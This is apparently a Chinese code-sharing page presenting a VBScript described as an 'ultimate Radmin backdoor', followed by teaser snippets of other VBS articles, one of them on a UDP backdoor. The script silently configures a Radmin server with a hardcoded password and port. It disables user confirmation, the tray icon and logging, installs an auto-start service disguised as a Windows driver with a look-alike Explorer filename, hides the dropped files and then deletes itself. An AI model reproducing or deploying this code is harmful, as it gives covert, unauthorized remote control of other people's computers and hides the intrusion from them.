Vbs脚本实现radmin终极后门代码_删除自身_vbs

复制代码 代码如下:

on error resume next 
const HKEY_LOCAL_MACHINE = &H80000002 
strComputer = "." 
Set StdOut = WScript.StdOut 
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_  
strComputer & "\root\default:StdRegProv") 
strKeyPath = "SYSTEM\RAdmin" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv") 
strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary) 
uBinary = Array(1,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary) 
uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)        //此为注册表导出十六进制转为十进制数据 pass:241241241 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)    //Radmin密码 
uBinary = Array(5,4,0,0)      //端口:1029 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary) 
uBinary = Array(10,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary) 
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv") 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 
strValueName = "LogFilePath" 
strValue = "c:\logfile.txt" 
set wshshell=createobject ("wscript.shell") 
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0) 
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv") 
strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp" 
strValueName = "Description" 
strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers." 
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
strValueName = "DisplayName" 
strValue = "Windows Management Instrumentation Player Drivers" 
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
strValueName = "ImagePath" 
strValue = "c:\windows\system32\Exporer.exe /service" 
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
set wshshell=createobject ("wscript.shell") 
a=wshshell.run ("net start WinManageHelp",0) 
b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0) 
c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0) 
d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0) 
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)    //自删除

最好的删除代码不错
createobject("scripting.filesystemobject").deletefile(script.scriptname)

时间: 2024-09-20 20:51:47

Vbs脚本实现radmin终极后门代码_删除自身_vbs的相关文章

vbs脚本 加密 几个小细节小结下_vbs

复制代码 代码如下: dxy:      你好!      我学vbs也有一小段时间了,最近看到一本书上讲vbs脚本的加密,就自己试了试,可是有一点问题,低级的语法错误我都自己修正了,可脚本运行后不起作用.所以想请教你一下.脚本的原理是这样的:它把代码转换成16进制,然后再写个解密代码,通过这个解密来执行加密的代码,将字符串成16进制的代码如下:  Function str2hex (Byval strHex)  For i=1 to Len(strHex)  sHex = sHex & Hex

VBS+MSWinsock打造灵巧UDP后门的相关资料_vbs

大概在一年前,VBS脚本病毒又揭起一阵热潮,一大群VBS病毒在互联网上盛行.那时的VBS病毒几乎都是用FSO.MAPI作为一个病毒传染引擎,所以我就想,VBS可否访问网络呢?如果它也能进行端口的连接,那就神奇了.从此之后,我就努力去找有关VBS的网络类的资料,可惜找了好久,什么收获也没有,直到一个月前高考结束了,我才可以静下来搞这个东西,并终于有了一点进展. 现在分析一下VBS的运作原理吧.VBS的全称是"Visual Basic Scripts",由于VBS是由Visual Basi

使用vbs脚本定时删除N天前的文件_vbs

脚本放在定时任务里代替服务定时执行一些操作比较方便,下面是实现删除文件夹下N天前创建的文件的vbs脚本,在配置文件 DelFolderList.txt 中配置要删除的文件路径,ONLY-DEL-FILES 下的路径 是只删除其下的文件,不删除其内的子目录的文件.DEL-FOLDER-FILES下的路径 是删除其内文件及其子目录内的文件,子目录为空时删除目录,删除的文件list 放在log文件夹内.例配置文件DelFolder.txt 内容如下: ONLY-DEL-FILESE:\Code\tes

JavaScript 模仿vbs中的 DateAdd() 函数的代码_时间日期

项目中需要用到日历,.net的日历控件又太重,只好用js写一个,日历的核心函数是 DateAdd(),编写过程中发现 js 里面操作时间比想象中的繁琐,不像vbscript中的可以轻松地dateadd,后来才想到用 setFullYear().setDate()等内置函数,可以拼合一个js版的 dateadd() 来,代码如下: 复制代码 代码如下: function DateAdd(interval,number,date){ // date 可以是时间对象也可以是字符串,如果是后者,形式必须

利用VBS发送短信的实现代码(通过飞信)_vbs

光看标题就已经觉得很牛逼了,听说过可以用 PHP 发送短信(飞信),也使用过 Python 实现的 PyFetion 发送过短信(飞信).我也看过对应的 PHP 和 Python 源码,实现起来还是比较复杂的,难道可以用 VBS 来实现? 看到代码后更觉得牛逼,竟然是使用 10086.cn (移动官网)上面的接口来实现的,飞信官方难道已经公布飞信接口了?若不是,难道是代码的作者自己发现的接口?那也太强大了!Google 了一下才发现,哦,都不是,而是 WAP 飞信.像我这种还在用着 2005 年

利用VBS脚本修改联想笔记本BIOS密码的代码分享

这篇文章主要介绍了利用VBS脚本修改联想笔记本BIOS密码的实现代码,感觉这不科学!无意中找到的一些资料,喜欢的朋友可以试试   这不科学!无意中找到的一些资料: vbs 代码: 复制代码 代码如下: strComputer = "." Set objWMIService = GetObject("winmgmts:" & strComputer & "rootWMI") ' Obtain an instance of the t

使用vbs脚本添加程序到自启动项的代码_vbs

因编辑器过滤了一些字符,比如&,所以下面的脚本可能会运行错误..看官添加&&这个字符就可以了. vbs脚本的功能呢是很多的,不过有时候我们只需要其中的某些功能,今天我突然想研究下怎么用vbs脚本实现添加程序到自启动项...... 首先来一段吧... 复制代码 代码如下: '========================================================================== ' ' VBScript Source File -- Cre

vbs脚本实现下载jre包并静默安装的代码实例_vbs

安装完成后可以回调,替换echo 123456789和pause就行了. dim path set ws = CreateObject("WScript.Shell") set fso=createobject("scripting.filesystemobject") ''定义安装路径 path = ws.ExpandEnvironmentStrings("%windir%")+"\jre6\" ''创建目录 If (fso

VBS脚本的应用

脚本 VBS脚本病毒的大量流行使我们对VBS的功能有了一个全新的认识,现在大家对它也开始重视起来.VBS代码在本地是通过Windows Script Host(WSH)解释执行的.VBS脚本的执行离不开WSH,WSH是微软提供的一种基于32位Windows平台的.与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行.利用WSH,用户能够操纵WSH对象.ActiveX对象.注册表和文件系统.在Windows 2000下,还可用WSH来访问Windows NT活动目录服